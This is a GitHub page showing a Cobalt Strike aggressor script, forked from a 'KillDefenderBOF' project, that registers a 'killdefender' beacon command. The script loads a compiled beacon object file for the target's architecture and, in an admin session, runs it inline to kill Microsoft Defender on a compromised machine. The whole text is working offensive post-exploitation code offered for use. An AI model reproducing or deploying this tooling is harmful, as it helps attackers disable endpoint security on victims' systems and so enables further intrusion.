forked from Cerbersec/KillDefenderBOF
-
Notifications
You must be signed in to change notification settings - Fork 1
/
killdefender.cna
46 lines (38 loc) · 1 KB
/
killdefender.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
beacon_command_register("killdefender", "kill defender", "Example: killdefender");
alias killdefender {
if (-is64 $1) {
$barch = "x64";
}
else
{
$barch = "x86";
}
# read in the BOF file
$handle = openf(script_resource("killdefender." . $barch . ".o"));
$data = readb($handle, -1);
closef($handle);
# you didn't compile BOF :(
if(strlen($data) == 0)
{
berror($1, "could not read bof file");
return;
}
if ((-isadmin $1))
{
# announce what we're doing
btask($1, "Hold on to your butts! Killing Defender!");
if (-is64 $1)
{
# spawn a Beacon post-ex job with the exploit DLL
beacon_inline_execute($1, $data, "go", $null);
}
else
{
# spawn a Beacon post-ex job with the exploit DLL
beacon_inline_execute($1, $data, "go", $null);
}
} else
{
berror($1, "We require an elevated session (admin)");
}
}